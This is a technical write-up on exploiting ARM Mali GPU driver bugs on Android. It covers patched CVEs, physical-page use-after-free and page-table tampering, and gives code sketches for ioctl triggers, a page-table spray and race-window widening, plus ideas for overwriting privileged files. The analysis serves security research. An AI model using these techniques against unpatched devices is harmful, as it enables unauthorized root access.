
GPU Driver Vulnerabilities: A Peek into the Technical Mysteries of Driver Exploitation



Using GPU vulnerabilities as a guide, this article introduces some of the kernel-exploitation techniques that security researchers have developed around the attack surface of GPU drivers.

Background

A mobile SoC platform consists of multiple hardware modules; the common ones are the CPU, GPU, modem baseband processor, ISP (image signal processor), and so on. These modules are interconnected over the hardware bus and cooperate to complete their tasks.


For GPU driver vulnerability research, one key property to keep in mind is that the GPU and CPU share the same RAM. On the CPU side, the operating system manages the page tables of the CPU MMU to map virtual addresses to physical addresses.


The GPU also has its own MMU, but the GPU's page tables are managed by the GPU driver running in the kernel on the CPU side, which restricts the range of physical addresses the GPU can access.


In real-world use, the CPU generally allocates a region of physical memory and maps it to the GPU; the GPU reads data from this shared memory, performs its computation or rendering, and writes the results back, completing the interaction between the CPU and the GPU. From a security standpoint, the special attack surface of a GPU driver comes from its need to maintain the GPU page tables. This process is complex and involves the cooperation of several kernel subsystems, so it is easy to get wrong, and historically a number of security vulnerabilities have stemmed from faulty GPU page-table management.


Taking the ARM Mali driver as an example, a few of the more representative vulnerabilities from recent years are listed below:

CVE            | Type                     | Primitive
CVE-2021-39793 | Page permission error    | Tampering with physical pages behind read-only mappings of user processes
CVE-2021-28664 | Page permission error    | Tampering with physical pages behind read-only mappings of user processes
CVE-2021-28663 | GPU MMU operation error  | Physical page UAF
CVE-2023-4211  | Race-condition UAF       | SLUB object UAF
CVE-2023-48409 | Integer overflow         | Heap overflow
CVE-2023-26083 | Kernel address leak      | Kernel address leak
CVE-2022-46395 | Race-condition UAF       | Physical page UAF

The first three vulnerabilities lie in the management of GPU page-table mappings; the last few are the usual driver vulnerability types.

CVE-2021-28664

The driver source analyzed here can be downloaded from: /developer/Files/downloads/mali-drivers/kernel/mali-bifrost-gpu/

Let's start with the simplest one. CVE-2021-28664 was, together with CVE-2021-28663, one of Mali's first notable vulnerabilities; both were captured by Project Zero in in-the-wild exploits. The patch is as follows:

 static struct kbase_va_region *kbase_mem_from_user_buffer(
                struct kbase_context *kctx, unsigned long address,
                unsigned long size, u64 *va_pages, u64 *flags)
 {
[...]
+       int write;
[...]
+       write = reg->flags & (KBASE_REG_CPU_WR | KBASE_REG_GPU_WR);
+
 #if KERNEL_VERSION(4, 6, 0) > LINUX_VERSION_CODE
        faulted_pages = get_user_pages(current, current->mm, address, *va_pages,
 #if KERNEL_VERSION(4, 4, 168) <= LINUX_VERSION_CODE && \
 KERNEL_VERSION(4, 5, 0) > LINUX_VERSION_CODE
-                       reg->flags & KBASE_REG_CPU_WR ? FOLL_WRITE : 0,
-                       pages, NULL);
+                       write ? FOLL_WRITE : 0, pages, NULL);
 #else
-                       reg->flags & KBASE_REG_CPU_WR, 0, pages, NULL);
+                       write, 0, pages, NULL);
 #endif
 #elif KERNEL_VERSION(4, 9, 0) > LINUX_VERSION_CODE
        faulted_pages = get_user_pages(address, *va_pages,
-                       reg->flags & KBASE_REG_CPU_WR, 0, pages, NULL);
+                       write, 0, pages, NULL);
 #else
        faulted_pages = get_user_pages(address, *va_pages,
-                       reg->flags & KBASE_REG_CPU_WR ? FOLL_WRITE : 0,
-                       pages, NULL);
+                       write ? FOLL_WRITE : 0, pages, NULL);
 #endif

The key point of the patch is that the write flag passed to get_user_pages changes from reg->flags & KBASE_REG_CPU_WR to reg->flags & (KBASE_REG_CPU_WR | KBASE_REG_GPU_WR). The two flags mean the following:

  • KBASE_REG_CPU_WR: the reg may be mapped into a userland process with write permission.
  • KBASE_REG_GPU_WR: the reg may be mapped to the GPU with write permission.

The type of reg is struct kbase_va_region. The Mali driver uses kbase_va_region to manage physical memory, covering physical page allocation and freeing as well as GPU/CPU page-table mapping.


The key elements are as follows:

  • cpu_alloc and gpu_alloc in kbase_va_region point to kbase_mem_phy_alloc, which represents the physical pages owned by the reg; in most scenarios cpu_alloc == gpu_alloc.
  • The flags field of kbase_va_region controls the permissions the driver uses when mapping the reg. If flags contains KBASE_REG_CPU_WR, the reg can be mapped writable by the CPU; without this flag the reg must not be mapped writable into a CPU process, guaranteeing that the process cannot modify those physical pages.

Core idea: The driver uses kbase_va_region to represent a set of physical memory that can be mapped by user processes on the CPU and by the GPU, with mapping permissions controlled by the reg->flags field.
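For reference, here is an abbreviated view of the two structures involved. The field names follow the kbase driver source (e.g. mali_kbase_mem.h), but unrelated fields are omitted and the exact layout varies across driver versions, so treat this as a sketch rather than the authoritative definition.

struct kbase_va_region {                        /* one block of physical memory resources */
        u64 start_pfn;                          /* GPU virtual address, in pages */
        size_t nr_pages;
        unsigned long flags;                    /* KBASE_REG_CPU_WR, KBASE_REG_GPU_WR, ... */
        struct kbase_mem_phy_alloc *cpu_alloc;  /* physical pages backing CPU mappings */
        struct kbase_mem_phy_alloc *gpu_alloc;  /* physical pages backing GPU mappings */
        int va_refcnt;                          /* number of users of this region */
};

struct kbase_mem_phy_alloc {
        struct kref kref;                       /* number of users of this allocation */
        atomic_t gpu_mappings;                  /* number of times mapped on the GPU */
        size_t nents;                           /* number of valid physical pages */
        struct tagged_addr *pages;              /* physical addresses of those pages */
};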

Returning to the vulnerability itself, the key code in its call path is as follows:

  • kbase_api_mem_import

    1. u64 flags = import->in.flags;

    2. kbase_mem_import(kctx, import->in.type, u64_to_user_ptr(import->in.phandle), import->in.padding, &import->out.gpu_va, &import->out.va_pages, &flags);

      1. copy_from_user(&user_buffer, phandle, sizeof(user_buffer))

      2. uptr = u64_to_user_ptr(user_buffer.ptr);

      3. kbase_mem_from_user_buffer(kctx, (unsigned long)uptr, user_buffer.length, va_pages, flags)

        1. struct kbase_va_region *reg = kbase_alloc_free_region(rbtree, 0, *va_pages, zone);
        2. kbase_update_region_flags(kctx, reg, *flags) // Set reg->flags according to the flags provided by the userland.
        3. faulted_pages = get_user_pages(address, *va_pages, reg->flags & KBASE_REG_CPU_WR ? FOLL_WRITE : 0, pages, NULL);

The vulnerability is that the write flag passed to get_user_pages only takes KBASE_REG_CPU_WR into account and ignores KBASE_REG_GPU_WR: when reg->flags contains only KBASE_REG_GPU_WR, the third parameter (gup_flags) of get_user_pages is 0.

/*
 * This is the same as get_user_pages_remote(), just with a
 * less-flexible calling convention where we assume that the task
 * and mm being operated on are the current task's and don't allow
 * passing of a locked parameter.  We also obviously don't pass
 * FOLL_REMOTE in here.
 */
long get_user_pages(unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas)
{
	return __get_user_pages_locked(current, current->mm, start, nr_pages,
				       pages, vmas, NULL, false,
				       gup_flags | FOLL_TOUCH);
}

get_user_pages walks the process page tables starting from the VA (start) supplied by the user process and returns pointers to the page structures for the physical pages backing those VAs, storing them in the pages array.


That is, it finds the process page tables via task_struct->mm and walks them to obtain the physical addresses.

If gup_flags contains FOLL_WRITE, the caller intends to write to the pages after pinning them, so get_user_pages has to treat read-only and CoW pages specially to prevent the physical pages behind such VAs from being modified unintentionally:

  • If the VMA is read-only, the API returns an error code.
  • If the VA maps to a CoW page, copy-on-write is performed inside the API and the newly allocated page is returned.


When gup_flags is 0, the result of the page-table walk is returned directly (the original physical page P0).

For this vulnerability, we can create a kbase_va_region whose reg->flags contains KBASE_REG_GPU_WR but not KBASE_REG_CPU_WR. Importing user memory then pins the pages behind arbitrary VAs of the process into the kbase_va_region without FOLL_WRITE, and the region can subsequently be mapped to the GPU with write permission, allowing us to tamper with the physical pages backing any read-only mapping in the process.
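As an illustration, a minimal userspace sketch of reaching this path is shown below. The struct layouts, flag bits, and ioctl number are copied from kbase UAPI headers of roughly this driver generation, but they differ between versions, so verify them against your own headers; mali_fd is assumed to be an open file descriptor for the Mali device node.

#include <fcntl.h>
#include <stdint.h>
#include <sys/ioctl.h>

/* Values as found in kbase UAPI headers of this era; treat them as assumptions. */
#define BASE_MEM_PROT_GPU_RD (1u << 2)
#define BASE_MEM_PROT_GPU_WR (1u << 3)            /* GPU-writable; CPU_WR deliberately left clear */
#define BASE_MEM_IMPORT_TYPE_USER_BUFFER 3

struct base_mem_import_user_buffer { uint64_t ptr; uint64_t length; };

union kbase_ioctl_mem_import {
    struct { uint64_t flags; uint64_t phandle; uint32_t type; uint32_t padding; } in;
    struct { uint64_t flags; uint64_t gpu_va; uint64_t va_pages; } out;
};
#define KBASE_IOCTL_MEM_IMPORT _IOWR(0x80, 22, union kbase_ioctl_mem_import)

/* Import an existing (possibly read-only) CPU mapping of the current process.
 * On an unpatched driver the pages are pinned without FOLL_WRITE because
 * KBASE_REG_CPU_WR is not requested, yet the region becomes GPU-writable. */
static int import_user_pages(int mali_fd, void *addr, uint64_t length)
{
    struct base_mem_import_user_buffer handle = {
        .ptr = (uint64_t)(uintptr_t)addr,
        .length = length,
    };
    union kbase_ioctl_mem_import import = {
        .in = {
            .flags   = BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_GPU_WR,
            .phandle = (uint64_t)(uintptr_t)&handle,
            .type    = BASE_MEM_IMPORT_TYPE_USER_BUFFER,
        },
    };
    return ioctl(mali_fd, KBASE_IOCTL_MEM_IMPORT, &import);
}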

Further exploitation of this primitive relies on operating-system mechanisms, so let's start with the simplest approach. When handling on-disk file systems, the Linux kernel caches the physical pages read from disk (the page cache) to speed up file access and, at the same time, to avoid keeping duplicate copies of a file's pages, reducing overhead.


The flow is roughly as follows:

  • When a process reads a page, e.g. through a read-only mmap, the kernel looks up the page cache and returns the page if it is found; otherwise it loads the page from disk into the page cache and then returns it.
  • Writes go through a corresponding cache write-back mechanism.

In particular, when two processes mmap the same file read-only at the same time, the VAs of both processes point to the same physical page.
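A minimal sketch to illustrate this sharing, assuming a 4 KiB page size and CAP_SYS_ADMIN (without it, /proc/self/pagemap reports zero PFNs on modern kernels); the choice of /etc/passwd as the mapped file is arbitrary:

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

static uint64_t pfn_of(void *addr)
{
    uint64_t entry = 0;
    int fd = open("/proc/self/pagemap", O_RDONLY);
    /* one 8-byte pagemap entry per virtual page */
    pread(fd, &entry, sizeof(entry), ((uintptr_t)addr / 4096) * sizeof(entry));
    close(fd);
    return entry & ((1ULL << 55) - 1);   /* bits 0-54 hold the page frame number */
}

int main(void)
{
    int fd = open("/etc/passwd", O_RDONLY);
    /* two independent read-only mappings of the same file page */
    volatile char *a = mmap(NULL, 4096, PROT_READ, MAP_SHARED, fd, 0);
    volatile char *b = mmap(NULL, 4096, PROT_READ, MAP_SHARED, fd, 0);
    (void)a[0]; (void)b[0];               /* fault both pages in */
    /* both mappings resolve to the same physical frame in the page cache */
    printf("pfn(a)=%llx pfn(b)=%llx\n",
           (unsigned long long)pfn_of((void *)a), (unsigned long long)pfn_of((void *)b));
    return 0;
}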

Thus, when we use the vulnerability to modify a physical page in the page cache, other processes are affected as well, because they all map the same physical address. This leads to the following attack ideas:

  • Map a privileged file read-only, use the vulnerability to tamper with its physical page in the page cache and inject shellcode, then gain privileges when a high-privilege process runs it.
  • Modify /etc/passwd in a similar fashion to escalate privileges.

Besides the file-system page cache, there is another very good target on the Android platform: the binder driver maps a read-only page into the userland process containing flat_binder_object structures, and binder_transaction_buffer_release uses the node reference recorded in the flat_binder_object (its binder/handle field) when releasing a transaction buffer.

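The relevant logic, paraphrased and abbreviated from AOSP drivers/android/binder.c (the BINDER_TYPE_BINDER branch is shown; the handle case goes through a binder_ref in the same spirit, and details vary across kernel versions):

/* inside binder_transaction_buffer_release(), for each object header hdr in the buffer */
case BINDER_TYPE_BINDER:
case BINDER_TYPE_WEAK_BINDER: {
        struct flat_binder_object *fp = to_flat_binder_object(hdr);
        /* look up the node named by the object */
        struct binder_node *node = binder_get_node(proc, fp->binder);

        if (node == NULL)
                break;
        /* drop the reference taken when the transaction was queued ... */
        binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER, 0);
        /* ... and free the node once its reference count reaches zero */
        binder_put_node(node);
} break;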

binder_get_node first looks up the node, then binder_put_node is called to drop the node's reference count, and the node is freed when that count reaches zero.

Normally this is correct, because the physical page holding the flat_binder_object cannot be modified from userland. But if we use the read-only-page write primitive to tamper with flat_binder_object->handle so that it points to another node, triggering binder_transaction_buffer_release unbalances that node's reference count.


In the end the vulnerability can be converted into a binder_node UAF, which can then be exploited in the same way as the CVE-2019-2205 exploit.

A similar vulnerability, CVE-2016-2067, was already present in Qualcomm GPU drivers back in 2016.


The same usage scenario means that the same class of vulnerability can arise.

CVE-2021-28663

This vulnerability is a physical page UAF caused by the Mali driver's management of GPU physical-page mappings. To understand it, you first need some familiarity with the relevant driver code. As mentioned in the previous section, Mali uses the kbase_va_region object to represent physical memory resources, which the CPU user process and the GPU can then map on demand in order to access that memory.


kbase_va_region creation happens in the kbase_api_mem_alloc interface; the key code is as follows:

  • kbase_api_mem_alloc

    • kbase_mem_alloc(kctx, alloc->in.va_pages, alloc->in.commit_pages, alloc->in.extent, &flags, &gpu_va);

      1. reg = kbase_alloc_free_region(rbtree, 0, va_pages, zone); // Allocate reg

      2. kbase_reg_prepare_native(reg, kctx, base_mem_group_id_get(*flags))

        1. reg->cpu_alloc = kbase_alloc_create(kctx, reg->nr_pages, KBASE_MEM_TYPE_NATIVE, group_id);
        2. reg->gpu_alloc = kbase_mem_phy_alloc_get(reg->cpu_alloc);
      3. kbase_alloc_phy_pages(reg, va_pages, commit_pages) // Allocate physical memory for reg

      4. if *flags & BASE_MEM_SAME_VA

        • kctx->pending_regions[cookie_nr] = reg;
        • cpu_addr = vm_mmap(kctx->filp, 0, va_map, prot, MAP_SHARED, cookie); // Mapping physical memory to GPU and CPU page tables
      5. else

        • kbase_gpu_mmap(kctx, reg, 0, va_pages, 1) // Map Physical Memory to GPU Page Tables

          • Insert the mappings into the GPU page table
          • atomic_inc(&alloc->gpu_mappings); // Increment gpu_mappings to record the number of GPU mappings

The driver gives BASE_MEM_SAME_VA special treatment: SAME_VA means that when the reg is mapped, the GPU and CPU use the same virtual address, presumably to make passing pointers between them more convenient.


If BASE_MEM_SAME_VA is not set, the physical memory is mapped to the GPU right away; otherwise it is mapped to both the GPU and CPU sides at the same VA via vm_mmap --> kbase_mmap --> kbasep_reg_mmap.

Both use kbase_gpu_mmap to map the physical memory corresponding to the reg into the GPU's page table.

kbase_va_region release happens in the kbase_api_mem_free interface; the key code is as follows:

  • kbase_api_mem_free

    • reg = kbase_region_tracker_find_region_base_address(kctx, gpu_addr);

    • err = kbase_mem_free_region(kctx, reg);

      • kbase_gpu_munmap(kctx, reg); // Remove GPU mapping

      • kbase_free_alloced_region(reg);

        1. kbase_mem_phy_alloc_put(reg->cpu_alloc);
        2. kbase_mem_phy_alloc_put(reg->gpu_alloc);
        3. kbase_va_region_alloc_put(kctx, reg);

The general logic is to first find the reg from gpu_addr and then drop the references to reg and reg->xx_alloc. For this kind of complex object management it helps to first map out the relationships between the objects along the normal flow; the life-cycle-related fields are va_refcnt on kbase_va_region, plus kref and gpu_mappings on kbase_mem_phy_alloc.


Consider the scenario where kbase_api_mem_alloc creates non-SAME_VA memory: kbase_gpu_mmap increments gpu_mappings by one, and when the region is later freed through kbase_api_mem_free, the reference counts of kbase_va_region and kbase_mem_phy_alloc drop to zero and both objects are freed.

In the SAME_VA case, the difference is that kbase_api_mem_alloc calls vm_mmap to map the reg to both the CPU and GPU sides, which increments the corresponding reference counts (va_refcnt, kref, gpu_mappings); when the process VA is munmap'ed, those reference counts are decremented again.


With this general picture of the driver's object management, let's look at the two interfaces involved in the vulnerability, kbase_api_mem_alias and kbase_api_mem_flags_change, and the functionality each one provides:

  • kbase_api_mem_alias: creates an alias mapping, i.e. allocates a new reg that shares kbase_mem_phy_alloc with other existing regs.
  • kbase_api_mem_flags_change: releases the physical pages held by a kbase_mem_phy_alloc.

The key code for kbase_api_mem_alias is as follows:

  • kbase_mem_alias

    1. reg = kbase_alloc_free_region(&kctx->reg_rbtree_same, 0, *num_pages, KBASE_REG_ZONE_SAME_VA);
    2. reg->gpu_alloc = kbase_alloc_create(kctx, 0, KBASE_MEM_TYPE_ALIAS, ...);
    3. reg->cpu_alloc = kbase_mem_phy_alloc_get(reg->gpu_alloc);
    4. aliasing_reg = kbase_region_tracker_find_region_base_address(kctx, (ai[i].handle.basep.handle >> PAGE_SHIFT) << PAGE_SHIFT);
    5. alloc = aliasing_reg->gpu_alloc;
    6. reg->gpu_alloc->imported.alias.aliased[i].alloc = kbase_mem_phy_alloc_get(alloc);
    7. kctx->pending_regions[gpu_va] = reg;

The main steps are to take a reference (kref) on each aliased alloc and to place the new reg into kctx->pending_regions; afterwards the process performs the CPU and GPU mapping via mmap (kbase_context_mmap).

if (reg->gpu_alloc->type == KBASE_MEM_TYPE_ALIAS) {
	u64 const stride = alloc->imported.alias.stride;
	/* map each alloc in aliased[] and increment its gpu_mappings */
	for (i = 0; i < alloc->imported.alias.nents; i++) {
		if (alloc->imported.alias.aliased[i].alloc) {
			err = kbase_mmu_insert_pages(kctx->kbdev,
					&kctx->mmu,
					reg->start_pfn + (i * stride),
					alloc->imported.alias.aliased[i].alloc->pages +
						alloc->imported.alias.aliased[i].offset,
					alloc->imported.alias.aliased[i].length,
					reg->flags & gwt_mask,
					kctx->as_nr,
					group_id);
			kbase_mem_phy_alloc_gpu_mapped(alloc->imported.alias.aliased[i].alloc);
		}
	}

Before and after the process that created the alias mapping calls mmap, the reference counts on the reg objects evolve as described below.


kbase_api_mem_alias increments aliased[i]->kref to make sure the alloc is not freed while it is in use; afterwards, when kbase_mmap maps the memory, it increments aliased[i]->gpu_mappings to record how many times it is mapped on the GPU and reg->va_refcnt to record how many times it is mapped on the CPU. There is nothing wrong with this process itself: reference counting keeps the objects in aliased[] alive.
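From userspace, the alias interface is reached roughly as sketched below. As with the earlier import example, the struct layout and ioctl number are taken from kbase UAPI headers of this driver generation and should be treated as assumptions to verify; mali_fd and the gpu_va of an existing region are assumed to be available, and the flag bits passed in are placeholders.

#include <stdint.h>
#include <sys/ioctl.h>

/* layouts as in kbase UAPI headers of this era; verify against your own headers */
struct base_mem_aliasing_info {
    uint64_t handle;          /* gpu_va of the region being aliased */
    uint64_t offset;          /* offset into it, in pages */
    uint64_t length;          /* length, in pages */
};

union kbase_ioctl_mem_alias {
    struct { uint64_t flags; uint64_t stride; uint64_t nents; uint64_t aliasing_info; } in;
    struct { uint64_t flags; uint64_t gpu_va; uint64_t va_pages; } out;
};
#define KBASE_IOCTL_MEM_ALIAS _IOWR(0x80, 21, union kbase_ioctl_mem_alias)

/* Create an alias region that shares the physical pages of target_gpu_va.
 * Returns the cookie/gpu_va used for the subsequent mmap, or 0 on failure. */
static uint64_t alias_region(int mali_fd, uint64_t target_gpu_va,
                             uint64_t nr_pages, uint64_t flags)
{
    struct base_mem_aliasing_info info = {
        .handle = target_gpu_va, .offset = 0, .length = nr_pages,
    };
    union kbase_ioctl_mem_alias alias = {
        .in = {
            .flags = flags,
            .stride = nr_pages,
            .nents = 1,
            .aliasing_info = (uint64_t)(uintptr_t)&info,
        },
    };
    if (ioctl(mali_fd, KBASE_IOCTL_MEM_ALIAS, &alias) < 0)
        return 0;
    return alias.out.gpu_va;
}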

The problem lies in the fact that kbase_api_mem_flags_change can release the physical pages in it without releasing the alloc:

  • kbase_api_mem_flags_change

    • kbase_mem_flags_change

      1. reg = kbase_region_tracker_find_region_base_address(kctx, gpu_addr);
      2. Check atomic_read(&reg->cpu_alloc->gpu_mappings) > 1; if the reg is currently mapped by the GPU more than once, bail out
      3. kbase_mem_evictable_make(reg->gpu_alloc); // Release physical pages in alloc

kbase_api_mem_flags_change uses kbase_mem_evictable_make to put the gpu_alloc onto a list managed by the driver itself (kctx->evict_list); when the kernel later triggers a shrinker operation, the driver frees the physical pages of every gpu_alloc on that list.

  • kbase_mem_evictable_make

    1. kbase_mem_shrink_cpu_mapping(kctx, gpu_alloc->reg, 0, gpu_alloc->nents); // remove the CPU mapping
    2. list_add(&gpu_alloc->evict_node, &kctx->evict_list); // add to the eviction list

Code to release kbase_mem_phy_alloc physical pages when shrinking:

  • kbase_mem_evictable_reclaim_scan_objects

    1. kbase_mem_shrink_gpu_mapping(kctx, alloc->reg, 0, alloc->nents); // Delete GPU page table entries

      • kbase_mmu_teardown_pages(kctx->kbdev, &kctx->mmu, reg->start_pfn + new_pages, delta, kctx->as_nr);
    2. kbase_free_phy_pages_helper(alloc, alloc->evicted); // Release the physical page

kbase_mem_flags_change checks gpu_mappings before calling kbase_mem_evictable_make, the intent presumably being that a reg which is mapped by the GPU more than once must not have its physical memory freed. But going back to the alias flow: at the end of kbase_api_mem_alias, the gpu_mappings count of each alloc in the aliased array is still 1.

At this point kbase_mem_flags_change can be called to put aliased[i] onto kctx->evict_list, while the entries in alloc->pages remain unchanged.

Next, mmap is called on the reg created by kbase_api_mem_alias, mapping the physical pages of aliased[i] (alloc->pages) to the GPU side; call the mapped address ALIAS_VA.

Finally, the shrink mechanism is triggered to release the physical page in aliased[i], after which ALIAS_VA also points to the released physical page, resulting in a physical page UAF.


To review the root cause: the driver mismanages gpu_mappings when creating alias mappings, and combined with the physical-page-freeing logic of kbase_api_mem_flags_change this yields a physical page UAF. In my understanding, hunting for this kind of bug means first analyzing the life cycle of the memory objects (heap objects and physical memory) and then walking through the timing of each API to look for unintended behavior; the focus remains the logic around object allocation, release, and copying.

Exploitation techniques for physical page UAF are quite mature by now; here are a few commonly used approaches:

  • Tampering with process page tables: use fork + mmap to spray process page tables so that they reclaim the freed physical pages, then modify the page tables through the GPU to gain arbitrary physical memory read/write (see the sketch after this list).
  • GPU page-table tampering: reclaim the freed physical pages as GPU page tables through the GPU driver interface, then modify those page tables to gain arbitrary physical memory read/write through the GPU.
  • Tampering with kernel objects: spray kernel objects (e.g. task_struct, cred) so that they reclaim the freed pages, then modify the objects through the GPU to complete the exploit.
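A minimal sketch of the first idea, the fork + mmap page-table spray; the child count, mapping size, and 4 KiB/2 MiB granularity are illustrative assumptions, and in a real exploit the spray would be sized to the number of freed pages:

#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

#define SPRAY_CHILDREN 64
#define SPRAY_SIZE     (512UL << 20)          /* 512 MiB of VA per child */

static void spray_page_tables(void)
{
    for (int i = 0; i < SPRAY_CHILDREN; i++) {
        if (fork() == 0) {
            char *p = mmap(NULL, SPRAY_SIZE, PROT_READ | PROT_WRITE,
                           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            /* touching one byte per 2 MiB forces the kernel to allocate a
             * fresh PTE page for each 2 MiB range, so freed physical pages
             * are likely to be reused as page-table pages */
            for (size_t off = 0; off < SPRAY_SIZE; off += (2UL << 20))
                p[off] = 1;
            pause();                          /* keep the page tables alive */
        }
    }
}

int main(void)
{
    spray_page_tables();
    pause();
    return 0;
}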

CVE-2022-46395

The exploitation path for the previous two vulnerabilities was roughly: find a new vulnerability, then develop a new exploitation technique for it. The vulnerability in this section is instead converted into the primitive of CVE-2021-28663, because the capability of 28663 is simply too strong: physical page UAF is simple and direct to exploit, and nowadays even heap vulnerabilities are increasingly converted into physical page UAFs (e.g. Dirty Pagetable).

The vulnerability is a race condition: after kbase_vmap_prot, another thread can free the physical page backing mapped_evt.

static int kbasep_write_soft_event_status(
        struct kbase_context *kctx, u64 evt, unsigned char new_status)
{
    ...
    mapped_evt = kbase_vmap_prot(kctx, evt, sizeof(*mapped_evt),
                     KBASE_REG_CPU_WR, &map);
    //Race window start
    if (!mapped_evt)                  
        return -EFAULT;
    *mapped_evt = new_status;
    //Race window end
    kbase_vunmap(kctx, &map);
    return 0;
}

To widen the race window, the author uses the timerfd clock-interrupt technique:

  migrate_to_cpu(0);   //<------- pin this task to a cpu

  int tfd = timerfd_create(CLOCK_MONOTONIC, 0);   //<----- creates timerfd
  //Adds epoll watchers
  int epfds[NR_EPFDS];
  for (int i=0; i<NR_EPFDS; i++)
    epfds[i] = epoll_create1(0);

  for (int i=0; i<NR_EPFDS; i++) {
    struct epoll_event ev = { .events = EPOLLIN };
    epoll_ctl(epfds[i], EPOLL_CTL_ADD, tfd, &ev);
  }

  timerfd_settime(tfd, TFD_TIMER_ABSTIME, ...);  //<----- schedule tfd to be available at a later time

  ioctl(mali_fd, KBASE_IOCTL_SOFT_EVENT_UPDATE,...); //<---- tfd becomes available and interrupts this ioctl

The general idea is to have a clock interrupt fire between kbase_vmap_prot and the write to *mapped_evt, widening the time window; if the physical page backing mapped_evt is freed between those two steps, we obtain a physical page UAF write.


The offset of mapped_evt within the page is controlled, and the value written is 0 or 1. In summary, the vulnerability's primitive is a UAF write to physical memory whose value can only be 0 or 1.

static inline struct kbase_mem_phy_alloc *kbase_alloc_create(
        struct kbase_context *kctx, size_t nr_pages,
        enum kbase_memory_type type, int group_id)
{
    ...
    size_t alloc_size = sizeof(*alloc) + sizeof(*alloc->pages) * nr_pages;
    ...
    /* Allocate based on the size to reduce internal fragmentation of vmem */
    if (alloc_size > KBASE_MEM_PHY_ALLOC_LARGE_THRESHOLD)
        alloc = vzalloc(alloc_size);
    else
        alloc = kzalloc(alloc_size, GFP_KERNEL);
    ...
}

When kbase_alloc_create allocates a kbase_mem_phy_alloc, it may call vzalloc. vzalloc computes the number of physical pages needed for the requested size and then calls alloc_page to allocate them one by one, which can be used to reclaim just-freed physical pages fairly quickly (slab cross-cache reuse takes much longer).

From the analysis of the previous vulnerability we know that gpu_mappings gates the freeing of physical pages; if the UAF write sets it to 0 or 1, the physical pages of an alias-mapped kbase_mem_phy_alloc can be freed early, again yielding a physical page UAF.

struct kbase_mem_phy_alloc {
	struct kref           kref;
	atomic_t              gpu_mappings;
	size_t                nents;
	struct tagged_addr    *pages;
	struct list_head      mappings;
	...
};


Once unrestricted physical page UAF reads and writes have been implemented, it's time for the usual exploitation process. The core of this exploit is to utilize the physical memory management structure of the GPU driver to convert a restricted UAF write into an unrestricted physical page UAF.

Attacking GPUs with non-GPU vulnerabilities

While the previous cases exploited vulnerabilities in the GPU driver itself, this case converts a vulnerability in another driver or module (a heap overflow in a camera driver) into a GPU primitive in order to obtain a physical page UAF. The core idea is the same as in CVE-2022-46395: tamper with the gpu_mappings of a kbase_mem_phy_alloc so that physical pages are freed early.

static inline struct kbase_mem_phy_alloc *kbase_alloc_create(
        struct kbase_context *kctx, size_t nr_pages,
        enum kbase_memory_type type, int group_id)
{
    ...
    size_t alloc_size = sizeof(*alloc) + sizeof(*alloc->pages) * nr_pages;
    ...
    alloc = kzalloc(alloc_size, GFP_KERNEL);
    ...
}

One interesting point: the researchers found that even with MTE enabled in the Android kernel there is still roughly a 50% chance that the overflow completes undetected, and when MTE does detect the overflow it does not cause a kernel panic but only kills the offending user process. This gives the attacker effectively unlimited attempts, which amounts to bypassing MTE.


Summary

Since CVE-2021-28663/CVE-2021-28664, researchers have paid increasing attention to GPU driver security, moving from hunting GPU-specific vulnerabilities at first to later converting all kinds of general vulnerabilities into GPU primitives. The core reason is that the GPU driver's capability is simply too powerful: once you control the GPU hardware's page tables you can read and write any physical page, and because the GPU is independent hardware it can directly bypass CPU-side security features (such as KNOX, PAC, MTE) and patch kernel code.

GPU security research has also opened up another direction for exploitation. Because GPU drivers have to manage physical memory themselves, they are prone to physical-memory UAFs; once exploitation techniques for physical page UAF were worked out, people realized just how powerful this primitive is, and many techniques for converting other vulnerabilities into physical page UAFs followed, such as Dirty Pagetable, USMA, and pipe_buffer->page pointer hijacking.

Another lesson from the GPU attack path is that fixing a vulnerability does not end the life of its exploitation technique: if a vulnerability's primitive is powerful and convenient to use, other vulnerabilities can be converted toward that primitive, reusing the accumulated exploitation experience.

Reference Links

  • Internal of the Android kernel backdoor vulnerability
  • Two bugs with one PoC: Rooting Pixel 6 from Android 12 to Android 13
  • The inside story of our CVE-2019-2025 exploit
  • /docs/eu-16/materials/
  • Rooting with root cause: finding a variant of a Project Zero bug
  • Off-By-One 2024 Day 1 - GPUAF Using a general GPU exploit tech to attack Pixel8